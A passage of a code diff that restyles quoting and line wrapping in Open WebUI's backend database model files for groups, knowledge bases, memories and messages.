int(time.time()), + 'is_active': False, + 'updated_at': int(time.time()), } ) db.commit()
backend/open_webui/models/groups.py+66 −123 modified@@ -34,7 +34,7 @@ class Group(Base): - __tablename__ = "group" + __tablename__ = 'group' id = Column(Text, unique=True, primary_key=True) user_id = Column(Text) @@ -70,12 +70,12 @@ class GroupModel(BaseModel): class GroupMember(Base): - __tablename__ = "group_member" + __tablename__ = 'group_member' id = Column(Text, unique=True, primary_key=True) group_id = Column( Text, - ForeignKey("group.id", ondelete="CASCADE"), + ForeignKey('group.id', ondelete='CASCADE'), nullable=False, ) user_id = Column(Text, nullable=False) @@ -133,28 +133,26 @@ class GroupListResponse(BaseModel): class GroupTable: def _ensure_default_share_config(self, group_data: dict) -> dict: """Ensure the group data dict has a default share config if not already set.""" - if "data" not in group_data or group_data["data"] is None: - group_data["data"] = {} - if "config" not in group_data["data"]: - group_data["data"]["config"] = {} - if "share" not in group_data["data"]["config"]: - group_data["data"]["config"]["share"] = DEFAULT_GROUP_SHARE_PERMISSION + if 'data' not in group_data or group_data['data'] is None: + group_data['data'] = {} + if 'config' not in group_data['data']: + group_data['data']['config'] = {} + if 'share' not in group_data['data']['config']: + group_data['data']['config']['share'] = DEFAULT_GROUP_SHARE_PERMISSION return group_data def insert_new_group( self, user_id: str, form_data: GroupForm, db: Optional[Session] = None ) -> Optional[GroupModel]: with get_db_context(db) as db: - group_data = self._ensure_default_share_config( - form_data.model_dump(exclude_none=True) - ) + group_data = self._ensure_default_share_config(form_data.model_dump(exclude_none=True)) group = GroupModel( **{ **group_data, - "id": str(uuid.uuid4()), - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'id': str(uuid.uuid4()), + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) @@ -183,57 +181,47 @@ def get_groups(self, filter, db: Optional[Session] = None) -> list[GroupResponse .where(GroupMember.group_id == Group.id) .correlate(Group) .scalar_subquery() - .label("member_count") + .label('member_count') ) query = db.query(Group, member_count) if filter: - if "query" in filter: - query = query.filter(Group.name.ilike(f"%{filter['query']}%")) + if 'query' in filter: + query = query.filter(Group.name.ilike(f'%{filter["query"]}%')) # When share filter is present, member check is handled in the share logic - if "share" in filter: - share_value = filter["share"] - member_id = filter.get("member_id") - json_share = Group.data["config"]["share"] + if 'share' in filter: + share_value = filter['share'] + member_id = filter.get('member_id') + json_share = Group.data['config']['share'] json_share_str = json_share.as_string() json_share_lower = func.lower(json_share_str) if share_value: anyone_can_share = or_( Group.data.is_(None), json_share_str.is_(None), - json_share_lower == "true", - json_share_lower == "1", # Handle SQLite boolean true + json_share_lower == 'true', + json_share_lower == '1', # Handle SQLite boolean true ) if member_id: - member_groups_select = select(GroupMember.group_id).where( - GroupMember.user_id == member_id - ) + member_groups_select = select(GroupMember.group_id).where(GroupMember.user_id == member_id) members_only_and_is_member = and_( - json_share_lower == "members", + json_share_lower == 'members', Group.id.in_(member_groups_select), ) - query = query.filter( - or_(anyone_can_share, members_only_and_is_member) - ) + query = query.filter(or_(anyone_can_share, members_only_and_is_member)) else: query = query.filter(anyone_can_share) else: - query = query.filter( - and_(Group.data.isnot(None), json_share_lower == "false") - ) + query = query.filter(and_(Group.data.isnot(None), json_share_lower == 'false')) else: # Only apply member_id filter when share filter is NOT present - if "member_id" in filter: + if 'member_id' in filter: query = query.filter( - Group.id.in_( - select(GroupMember.group_id).where( - GroupMember.user_id == filter["member_id"] - ) - ) + Group.id.in_(select(GroupMember.group_id).where(GroupMember.user_id == filter['member_id'])) ) results = query.order_by(Group.updated_at.desc()).all() @@ -242,7 +230,7 @@ def get_groups(self, filter, db: Optional[Session] = None) -> list[GroupResponse GroupResponse.model_validate( { **GroupModel.model_validate(group).model_dump(), - "member_count": count or 0, + 'member_count': count or 0, } ) for group, count in results @@ -259,22 +247,16 @@ def search_groups( query = db.query(Group) if filter: - if "query" in filter: - query = query.filter(Group.name.ilike(f"%{filter['query']}%")) - if "member_id" in filter: + if 'query' in filter: + query = query.filter(Group.name.ilike(f'%{filter["query"]}%')) + if 'member_id' in filter: query = query.filter( - Group.id.in_( - select(GroupMember.group_id).where( - GroupMember.user_id == filter["member_id"] - ) - ) + Group.id.in_(select(GroupMember.group_id).where(GroupMember.user_id == filter['member_id'])) ) - if "share" in filter: - share_value = filter["share"] - query = query.filter( - Group.data.op("->>")("share") == str(share_value) - ) + if 'share' in filter: + share_value = filter['share'] + query = query.filter(Group.data.op('->>')('share') == str(share_value)) total = query.count() @@ -283,32 +265,24 @@ def search_groups( .where(GroupMember.group_id == Group.id) .correlate(Group) .scalar_subquery() - .label("member_count") - ) - results = ( - query.add_columns(member_count) - .order_by(Group.updated_at.desc()) - .offset(skip) - .limit(limit) - .all() + .label('member_count') ) + results = query.add_columns(member_count).order_by(Group.updated_at.desc()).offset(skip).limit(limit).all() return { - "items": [ + 'items': [ GroupResponse.model_validate( { **GroupModel.model_validate(group).model_dump(), - "member_count": count or 0, + 'member_count': count or 0, } ) for group, count in results ], - "total": total, + 'total': total, } - def get_groups_by_member_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[GroupModel]: + def get_groups_by_member_id(self, user_id: str, db: Optional[Session] = None) -> list[GroupModel]: with get_db_context(db) as db: return [ GroupModel.model_validate(group) @@ -340,51 +314,37 @@ def get_groups_by_member_ids( return user_groups - def get_group_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[GroupModel]: + def get_group_by_id(self, id: str, db: Optional[Session] = None) -> Optional[GroupModel]: try: with get_db_context(db) as db: group = db.query(Group).filter_by(id=id).first() return GroupModel.model_validate(group) if group else None except Exception: return None - def get_group_user_ids_by_id( - self, id: str, db: Optional[Session] = None - ) -> list[str]: + def get_group_user_ids_by_id(self, id: str, db: Optional[Session] = None) -> list[str]: with get_db_context(db) as db: - members = ( - db.query(GroupMember.user_id).filter(GroupMember.group_id == id).all() - ) + members = db.query(GroupMember.user_id).filter(GroupMember.group_id == id).all() if not members: return [] return [m[0] for m in members] - def get_group_user_ids_by_ids( - self, group_ids: list[str], db: Optional[Session] = None - ) -> dict[str, list[str]]: + def get_group_user_ids_by_ids(self, group_ids: list[str], db: Optional[Session] = None) -> dict[str, list[str]]: with get_db_context(db) as db: members = ( - db.query(GroupMember.group_id, GroupMember.user_id) - .filter(GroupMember.group_id.in_(group_ids)) - .all() + db.query(GroupMember.group_id, GroupMember.user_id).filter(GroupMember.group_id.in_(group_ids)).all() ) - group_user_ids: dict[str, list[str]] = { - group_id: [] for group_id in group_ids - } + group_user_ids: dict[str, list[str]] = {group_id: [] for group_id in group_ids} for group_id, user_id in members: group_user_ids[group_id].append(user_id) return group_user_ids - def set_group_user_ids_by_id( - self, group_id: str, user_ids: list[str], db: Optional[Session] = None - ) -> None: + def set_group_user_ids_by_id(self, group_id: str, user_ids: list[str], db: Optional[Session] = None) -> None: with get_db_context(db) as db: # Delete existing members db.query(GroupMember).filter(GroupMember.group_id == group_id).delete() @@ -405,20 +365,12 @@ def set_group_user_ids_by_id( db.add_all(new_members) db.commit() - def get_group_member_count_by_id( - self, id: str, db: Optional[Session] = None - ) -> int: + def get_group_member_count_by_id(self, id: str, db: Optional[Session] = None) -> int: with get_db_context(db) as db: - count = ( - db.query(func.count(GroupMember.user_id)) - .filter(GroupMember.group_id == id) - .scalar() - ) + count = db.query(func.count(GroupMember.user_id)).filter(GroupMember.group_id == id).scalar() return count if count else 0 - def get_group_member_counts_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> dict[str, int]: + def get_group_member_counts_by_ids(self, ids: list[str], db: Optional[Session] = None) -> dict[str, int]: if not ids: return {} with get_db_context(db) as db: @@ -442,7 +394,7 @@ def update_group_by_id( db.query(Group).filter_by(id=id).update( { **form_data.model_dump(exclude_none=True), - "updated_at": int(time.time()), + 'updated_at': int(time.time()), } ) db.commit() @@ -470,9 +422,7 @@ def delete_all_groups(self, db: Optional[Session] = None) -> bool: except Exception: return False - def remove_user_from_all_groups( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def remove_user_from_all_groups(self, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: try: # Find all groups the user belongs to @@ -489,9 +439,7 @@ def remove_user_from_all_groups( GroupMember.group_id == group.id, GroupMember.user_id == user_id ).delete() - db.query(Group).filter_by(id=group.id).update( - {"updated_at": int(time.time())} - ) + db.query(Group).filter_by(id=group.id).update({'updated_at': int(time.time())}) db.commit() return True @@ -503,7 +451,6 @@ def remove_user_from_all_groups( def create_groups_by_group_names( self, user_id: str, group_names: list[str], db: Optional[Session] = None ) -> list[GroupModel]: - # check for existing groups existing_groups = self.get_all_groups(db=db) existing_group_names = {group.name for group in existing_groups} @@ -517,10 +464,10 @@ def create_groups_by_group_names( id=str(uuid.uuid4()), user_id=user_id, name=group_name, - description="", + description='', data={ - "config": { - "share": DEFAULT_GROUP_SHARE_PERMISSION, + 'config': { + 'share': DEFAULT_GROUP_SHARE_PERMISSION, } }, created_at=int(time.time()), @@ -537,17 +484,13 @@ def create_groups_by_group_names( continue return new_groups - def sync_groups_by_group_names( - self, user_id: str, group_names: list[str], db: Optional[Session] = None - ) -> bool: + def sync_groups_by_group_names(self, user_id: str, group_names: list[str], db: Optional[Session] = None) -> bool: with get_db_context(db) as db: try: now = int(time.time()) # 1. Groups that SHOULD contain the user - target_groups = ( - db.query(Group).filter(Group.name.in_(group_names)).all() - ) + target_groups = db.query(Group).filter(Group.name.in_(group_names)).all() target_group_ids = {g.id for g in target_groups} # 2. Groups the user is CURRENTLY in @@ -571,7 +514,7 @@ def sync_groups_by_group_names( ).delete(synchronize_session=False) db.query(Group).filter(Group.id.in_(groups_to_remove)).update( - {"updated_at": now}, synchronize_session=False + {'updated_at': now}, synchronize_session=False ) # 5. Bulk insert missing memberships @@ -588,7 +531,7 @@ def sync_groups_by_group_names( if groups_to_add: db.query(Group).filter(Group.id.in_(groups_to_add)).update( - {"updated_at": now}, synchronize_session=False + {'updated_at': now}, synchronize_session=False ) db.commit() @@ -656,9 +599,9 @@ def remove_users_from_group( return GroupModel.model_validate(group) # Remove users from group_member in batch - db.query(GroupMember).filter( - GroupMember.group_id == id, GroupMember.user_id.in_(user_ids) - ).delete(synchronize_session=False) + db.query(GroupMember).filter(GroupMember.group_id == id, GroupMember.user_id.in_(user_ids)).delete( + synchronize_session=False + ) # Update group timestamp group.updated_at = int(time.time())
backend/open_webui/models/knowledge.py+90 −169 modified@@ -38,7 +38,7 @@ class Knowledge(Base): - __tablename__ = "knowledge" + __tablename__ = 'knowledge' id = Column(Text, unique=True, primary_key=True) user_id = Column(Text) @@ -70,24 +70,18 @@ class KnowledgeModel(BaseModel): class KnowledgeFile(Base): - __tablename__ = "knowledge_file" + __tablename__ = 'knowledge_file' id = Column(Text, unique=True, primary_key=True) - knowledge_id = Column( - Text, ForeignKey("knowledge.id", ondelete="CASCADE"), nullable=False - ) - file_id = Column(Text, ForeignKey("file.id", ondelete="CASCADE"), nullable=False) + knowledge_id = Column(Text, ForeignKey('knowledge.id', ondelete='CASCADE'), nullable=False) + file_id = Column(Text, ForeignKey('file.id', ondelete='CASCADE'), nullable=False) user_id = Column(Text, nullable=False) created_at = Column(BigInteger, nullable=False) updated_at = Column(BigInteger, nullable=False) - __table_args__ = ( - UniqueConstraint( - "knowledge_id", "file_id", name="uq_knowledge_file_knowledge_file" - ), - ) + __table_args__ = (UniqueConstraint('knowledge_id', 'file_id', name='uq_knowledge_file_knowledge_file'),) class KnowledgeFileModel(BaseModel): @@ -138,24 +132,18 @@ class KnowledgeFileListResponse(BaseModel): class KnowledgeTable: - def _get_access_grants( - self, knowledge_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("knowledge", knowledge_id, db=db) + def _get_access_grants(self, knowledge_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('knowledge', knowledge_id, db=db) def _to_knowledge_model( self, knowledge: Knowledge, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> KnowledgeModel: - knowledge_data = KnowledgeModel.model_validate(knowledge).model_dump( - exclude={"access_grants"} - ) - knowledge_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(knowledge_data["id"], db=db) + knowledge_data = KnowledgeModel.model_validate(knowledge).model_dump(exclude={'access_grants'}) + knowledge_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(knowledge_data['id'], db=db) ) return KnowledgeModel.model_validate(knowledge_data) @@ -165,23 +153,21 @@ def insert_new_knowledge( with get_db_context(db) as db: knowledge = KnowledgeModel( **{ - **form_data.model_dump(exclude={"access_grants"}), - "id": str(uuid.uuid4()), - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), - "access_grants": [], + **form_data.model_dump(exclude={'access_grants'}), + 'id': str(uuid.uuid4()), + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), + 'access_grants': [], } ) try: - result = Knowledge(**knowledge.model_dump(exclude={"access_grants"})) + result = Knowledge(**knowledge.model_dump(exclude={'access_grants'})) db.add(result) db.commit() db.refresh(result) - AccessGrants.set_access_grants( - "knowledge", result.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('knowledge', result.id, form_data.access_grants, db=db) if result: return self._to_knowledge_model(result, db=db) else: @@ -193,17 +179,13 @@ def get_knowledge_bases( self, skip: int = 0, limit: int = 30, db: Optional[Session] = None ) -> list[KnowledgeUserModel]: with get_db_context(db) as db: - all_knowledge = ( - db.query(Knowledge).order_by(Knowledge.updated_at.desc()).all() - ) + all_knowledge = db.query(Knowledge).order_by(Knowledge.updated_at.desc()).all() user_ids = list(set(knowledge.user_id for knowledge in all_knowledge)) knowledge_ids = [knowledge.id for knowledge in all_knowledge] users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else [] users_dict = {user.id: user for user in users} - grants_map = AccessGrants.get_grants_by_resources( - "knowledge", knowledge_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('knowledge', knowledge_ids, db=db) knowledge_bases = [] for knowledge in all_knowledge: @@ -216,7 +198,7 @@ def get_knowledge_bases( access_grants=grants_map.get(knowledge.id, []), db=db, ).model_dump(), - "user": user.model_dump() if user else None, + 'user': user.model_dump() if user else None, } ) ) @@ -232,36 +214,34 @@ def search_knowledge_bases( ) -> KnowledgeListResponse: try: with get_db_context(db) as db: - query = db.query(Knowledge, User).outerjoin( - User, User.id == Knowledge.user_id - ) + query = db.query(Knowledge, User).outerjoin(User, User.id == Knowledge.user_id) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: query = query.filter( or_( - Knowledge.name.ilike(f"%{query_key}%"), - Knowledge.description.ilike(f"%{query_key}%"), - User.name.ilike(f"%{query_key}%"), - User.email.ilike(f"%{query_key}%"), - User.username.ilike(f"%{query_key}%"), + Knowledge.name.ilike(f'%{query_key}%'), + Knowledge.description.ilike(f'%{query_key}%'), + User.name.ilike(f'%{query_key}%'), + User.email.ilike(f'%{query_key}%'), + User.username.ilike(f'%{query_key}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Knowledge.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Knowledge.user_id != user_id) query = AccessGrants.has_permission_filter( db=db, query=query, DocumentModel=Knowledge, filter=filter, - resource_type="knowledge", - permission="read", + resource_type='knowledge', + permission='read', ) query = query.order_by(Knowledge.updated_at.desc(), Knowledge.id.asc()) @@ -275,9 +255,7 @@ def search_knowledge_bases( items = query.all() knowledge_ids = [kb.id for kb, _ in items] - grants_map = AccessGrants.get_grants_by_resources( - "knowledge", knowledge_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('knowledge', knowledge_ids, db=db) knowledge_bases = [] for knowledge_base, user in items: @@ -289,11 +267,7 @@ def search_knowledge_bases( access_grants=grants_map.get(knowledge_base.id, []), db=db, ).model_dump(), - "user": ( - UserModel.model_validate(user).model_dump() - if user - else None - ), + 'user': (UserModel.model_validate(user).model_dump() if user else None), } ) ) @@ -327,15 +301,15 @@ def search_knowledge_files( query=query, DocumentModel=Knowledge, filter=filter, - resource_type="knowledge", - permission="read", + resource_type='knowledge', + permission='read', ) # Apply filename search if filter: - q = filter.get("query") + q = filter.get('query') if q: - query = query.filter(File.filename.ilike(f"%{q}%")) + query = query.filter(File.filename.ilike(f'%{q}%')) # Order by file changes query = query.order_by(File.updated_at.desc(), File.id.asc()) @@ -355,69 +329,53 @@ def search_knowledge_files( items.append( FileUserResponse( **FileModel.model_validate(file).model_dump(), - user=( - UserResponse( - **UserModel.model_validate(user).model_dump() - ) - if user - else None - ), - collection=self._to_knowledge_model( - knowledge, db=db - ).model_dump(), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), + collection=self._to_knowledge_model(knowledge, db=db).model_dump(), ) ) return KnowledgeFileListResponse(items=items, total=total) except Exception as e: - print("search_knowledge_files error:", e) + print('search_knowledge_files error:', e) return KnowledgeFileListResponse(items=[], total=0) - def check_access_by_user_id( - self, id, user_id, permission="write", db: Optional[Session] = None - ) -> bool: + def check_access_by_user_id(self, id, user_id, permission='write', db: Optional[Session] = None) -> bool: knowledge = self.get_knowledge_by_id(id, db=db) if not knowledge: return False if knowledge.user_id == user_id: return True - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return AccessGrants.has_access( user_id=user_id, - resource_type="knowledge", + resource_type='knowledge', resource_id=knowledge.id, permission=permission, user_group_ids=user_group_ids, db=db, ) def get_knowledge_bases_by_user_id( - self, user_id: str, permission: str = "write", db: Optional[Session] = None + self, user_id: str, permission: str = 'write', db: Optional[Session] = None ) -> list[KnowledgeUserModel]: knowledge_bases = self.get_knowledge_bases(db=db) - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return [ knowledge_base for knowledge_base in knowledge_bases if knowledge_base.user_id == user_id or AccessGrants.has_access( user_id=user_id, - resource_type="knowledge", + resource_type='knowledge', resource_id=knowledge_base.id, permission=permission, user_group_ids=user_group_ids, db=db, ) ] - def get_knowledge_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[KnowledgeModel]: + def get_knowledge_by_id(self, id: str, db: Optional[Session] = None) -> Optional[KnowledgeModel]: try: with get_db_context(db) as db: knowledge = db.query(Knowledge).filter_by(id=id).first() @@ -435,23 +393,19 @@ def get_knowledge_by_id_and_user_id( if knowledge.user_id == user_id: return knowledge - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} if AccessGrants.has_access( user_id=user_id, - resource_type="knowledge", + resource_type='knowledge', resource_id=knowledge.id, - permission="write", + permission='write', user_group_ids=user_group_ids, db=db, ): return knowledge return None - def get_knowledges_by_file_id( - self, file_id: str, db: Optional[Session] = None - ) -> list[KnowledgeModel]: + def get_knowledges_by_file_id(self, file_id: str, db: Optional[Session] = None) -> list[KnowledgeModel]: try: with get_db_context(db) as db: knowledges = ( @@ -461,9 +415,7 @@ def get_knowledges_by_file_id( .all() ) knowledge_ids = [k.id for k in knowledges] - grants_map = AccessGrants.get_grants_by_resources( - "knowledge", knowledge_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('knowledge', knowledge_ids, db=db) return [ self._to_knowledge_model( knowledge, @@ -497,32 +449,26 @@ def search_files_by_id( primary_sort = File.updated_at.desc() if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: - query = query.filter(or_(File.filename.ilike(f"%{query_key}%"))) + query = query.filter(or_(File.filename.ilike(f'%{query_key}%'))) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(KnowledgeFile.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(KnowledgeFile.user_id != user_id) - order_by = filter.get("order_by") - direction = filter.get("direction") - is_asc = direction == "asc" + order_by = filter.get('order_by') + direction = filter.get('direction') + is_asc = direction == 'asc' - if order_by == "name": - primary_sort = ( - File.filename.asc() if is_asc else File.filename.desc() - ) - elif order_by == "created_at": - primary_sort = ( - File.created_at.asc() if is_asc else File.created_at.desc() - ) - elif order_by == "updated_at": - primary_sort = ( - File.updated_at.asc() if is_asc else File.updated_at.desc() - ) + if order_by == 'name': + primary_sort = File.filename.asc() if is_asc else File.filename.desc() + elif order_by == 'created_at': + primary_sort = File.created_at.asc() if is_asc else File.created_at.desc() + elif order_by == 'updated_at': + primary_sort = File.updated_at.asc() if is_asc else File.updated_at.desc() # Apply sort with secondary key for deterministic pagination query = query.order_by(primary_sort, File.id.asc()) @@ -542,13 +488,7 @@ def search_files_by_id( files.append( FileUserResponse( **FileModel.model_validate(file).model_dump(), - user=( - UserResponse( - **UserModel.model_validate(user).model_dump() - ) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) @@ -557,9 +497,7 @@ def search_files_by_id( print(e) return KnowledgeFileListResponse(items=[], total=0) - def get_files_by_id( - self, knowledge_id: str, db: Optional[Session] = None - ) -> list[FileModel]: + def get_files_by_id(self, knowledge_id: str, db: Optional[Session] = None) -> list[FileModel]: try: with get_db_context(db) as db: files = ( @@ -572,9 +510,7 @@ def get_files_by_id( except Exception: return [] - def get_file_metadatas_by_id( - self, knowledge_id: str, db: Optional[Session] = None - ) -> list[FileMetadataResponse]: + def get_file_metadatas_by_id(self, knowledge_id: str, db: Optional[Session] = None) -> list[FileMetadataResponse]: try: with get_db_context(db) as db: files = self.get_files_by_id(knowledge_id, db=db) @@ -592,12 +528,12 @@ def add_file_to_knowledge_by_id( with get_db_context(db) as db: knowledge_file = KnowledgeFileModel( **{ - "id": str(uuid.uuid4()), - "knowledge_id": knowledge_id, - "file_id": file_id, - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'id': str(uuid.uuid4()), + 'knowledge_id': knowledge_id, + 'file_id': file_id, + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) @@ -613,37 +549,24 @@ def add_file_to_knowledge_by_id( except Exception: return None - def has_file( - self, knowledge_id: str, file_id: str, db: Optional[Session] = None - ) -> bool: + def has_file(self, knowledge_id: str, file_id: str, db: Optional[Session] = None) -> bool: """Check whether a file belongs to a knowledge base.""" try: with get_db_context(db) as db: - return ( - db.query(KnowledgeFile) - .filter_by(knowledge_id=knowledge_id, file_id=file_id) - .first() - is not None - ) + return db.query(KnowledgeFile).filter_by(knowledge_id=knowledge_id, file_id=file_id).first() is not None except Exception: return False - def remove_file_from_knowledge_by_id( - self, knowledge_id: str, file_id: str, db: Optional[Session] = None - ) -> bool: + def remove_file_from_knowledge_by_id(self, knowledge_id: str, file_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - db.query(KnowledgeFile).filter_by( - knowledge_id=knowledge_id, file_id=file_id - ).delete() + db.query(KnowledgeFile).filter_by(knowledge_id=knowledge_id, file_id=file_id).delete() db.commit() return True except Exception: return False - def reset_knowledge_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[KnowledgeModel]: + def reset_knowledge_by_id(self, id: str, db: Optional[Session] = None) -> Optional[KnowledgeModel]: try: with get_db_context(db) as db: # Delete all knowledge_file entries for this knowledge_id @@ -653,7 +576,7 @@ def reset_knowledge_by_id( # Update the knowledge entry's updated_at timestamp db.query(Knowledge).filter_by(id=id).update( { - "updated_at": int(time.time()), + 'updated_at': int(time.time()), } ) db.commit() @@ -675,15 +598,13 @@ def update_knowledge_by_id( knowledge = self.get_knowledge_by_id(id=id, db=db) db.query(Knowledge).filter_by(id=id).update( { - **form_data.model_dump(exclude={"access_grants"}), - "updated_at": int(time.time()), + **form_data.model_dump(exclude={'access_grants'}), + 'updated_at': int(time.time()), } ) db.commit() if form_data.access_grants is not None: - AccessGrants.set_access_grants( - "knowledge", id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('knowledge', id, form_data.access_grants, db=db) return self.get_knowledge_by_id(id=id, db=db) except Exception as e: log.exception(e) @@ -697,8 +618,8 @@ def update_knowledge_data_by_id( knowledge = self.get_knowledge_by_id(id=id, db=db) db.query(Knowledge).filter_by(id=id).update( { - "data": data, - "updated_at": int(time.time()), + 'data': data, + 'updated_at': int(time.time()), } ) db.commit() @@ -710,7 +631,7 @@ def update_knowledge_data_by_id( def delete_knowledge_by_id(self, id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - AccessGrants.revoke_all_access("knowledge", id, db=db) + AccessGrants.revoke_all_access('knowledge', id, db=db) db.query(Knowledge).filter_by(id=id).delete() db.commit() return True @@ -722,7 +643,7 @@ def delete_all_knowledge(self, db: Optional[Session] = None) -> bool: try: knowledge_ids = [row[0] for row in db.query(Knowledge.id).all()] for knowledge_id in knowledge_ids: - AccessGrants.revoke_all_access("knowledge", knowledge_id, db=db) + AccessGrants.revoke_all_access('knowledge', knowledge_id, db=db) db.query(Knowledge).delete() db.commit()
backend/open_webui/models/memories.py+10 −18 modified@@ -13,7 +13,7 @@ class Memory(Base): - __tablename__ = "memory" + __tablename__ = 'memory' id = Column(String, primary_key=True, unique=True) user_id = Column(String) @@ -49,11 +49,11 @@ def insert_new_memory( memory = MemoryModel( **{ - "id": id, - "user_id": user_id, - "content": content, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'id': id, + 'user_id': user_id, + 'content': content, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) result = Memory(**memory.model_dump()) @@ -95,19 +95,15 @@ def get_memories(self, db: Optional[Session] = None) -> list[MemoryModel]: except Exception: return None - def get_memories_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[MemoryModel]: + def get_memories_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[MemoryModel]: with get_db_context(db) as db: try: memories = db.query(Memory).filter_by(user_id=user_id).all() return [MemoryModel.model_validate(memory) for memory in memories] except Exception: return None - def get_memory_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[MemoryModel]: + def get_memory_by_id(self, id: str, db: Optional[Session] = None) -> Optional[MemoryModel]: with get_db_context(db) as db: try: memory = db.get(Memory, id) @@ -126,9 +122,7 @@ def delete_memory_by_id(self, id: str, db: Optional[Session] = None) -> bool: except Exception: return False - def delete_memories_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_memories_by_user_id(self, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: try: db.query(Memory).filter_by(user_id=user_id).delete() @@ -138,9 +132,7 @@ def delete_memories_by_user_id( except Exception: return False - def delete_memory_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_memory_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: try: memory = db.get(Memory, id)
backend/open_webui/models/messages.py+87 −144 modified@@ -21,7 +21,7 @@ class MessageReaction(Base): - __tablename__ = "message_reaction" + __tablename__ = 'message_reaction' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text) message_id = Column(Text) @@ -40,7 +40,7 @@ class MessageReactionModel(BaseModel): class Message(Base): - __tablename__ = "message" + __tablename__ = 'message' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text) @@ -112,7 +112,7 @@ class MessageUserResponse(MessageModel): class MessageUserSlimResponse(MessageUserResponse): data: bool | None = None - @field_validator("data", mode="before") + @field_validator('data', mode='before') def convert_data_to_bool(cls, v): # No data or not a dict → False if not isinstance(v, dict): @@ -152,19 +152,19 @@ def insert_new_message( message = MessageModel( **{ - "id": id, - "user_id": user_id, - "channel_id": channel_id, - "reply_to_id": form_data.reply_to_id, - "parent_id": form_data.parent_id, - "is_pinned": False, - "pinned_at": None, - "pinned_by": None, - "content": form_data.content, - "data": form_data.data, - "meta": form_data.meta, - "created_at": ts, - "updated_at": ts, + 'id': id, + 'user_id': user_id, + 'channel_id': channel_id, + 'reply_to_id': form_data.reply_to_id, + 'parent_id': form_data.parent_id, + 'is_pinned': False, + 'pinned_at': None, + 'pinned_by': None, + 'content': form_data.content, + 'data': form_data.data, + 'meta': form_data.meta, + 'created_at': ts, + 'updated_at': ts, } ) result = Message(**message.model_dump()) @@ -186,9 +186,7 @@ def get_message_by_id( return None reply_to_message = ( - self.get_message_by_id( - message.reply_to_id, include_thread_replies=False, db=db - ) + self.get_message_by_id(message.reply_to_id, include_thread_replies=False, db=db) if message.reply_to_id else None ) @@ -200,22 +198,22 @@ def get_message_by_id( thread_replies = self.get_thread_replies_by_message_id(id, db=db) # Check if message was sent by webhook (webhook info in meta takes precedence) - webhook_info = message.meta.get("webhook") if message.meta else None - if webhook_info and webhook_info.get("id"): + webhook_info = message.meta.get('webhook') if message.meta else None + if webhook_info and webhook_info.get('id'): # Look up webhook by ID to get current name - webhook = Channels.get_webhook_by_id(webhook_info.get("id"), db=db) + webhook = Channels.get_webhook_by_id(webhook_info.get('id'), db=db) if webhook: user_info = { - "id": webhook.id, - "name": webhook.name, - "role": "webhook", + 'id': webhook.id, + 'name': webhook.name, + 'role': 'webhook', } else: # Webhook was deleted, use placeholder user_info = { - "id": webhook_info.get("id"), - "name": "Deleted Webhook", - "role": "webhook", + 'id': webhook_info.get('id'), + 'name': 'Deleted Webhook', + 'role': 'webhook', } else: user = Users.get_user_by_id(message.user_id, db=db) @@ -224,79 +222,57 @@ def get_message_by_id( return MessageResponse.model_validate( { **MessageModel.model_validate(message).model_dump(), - "user": user_info, - "reply_to_message": 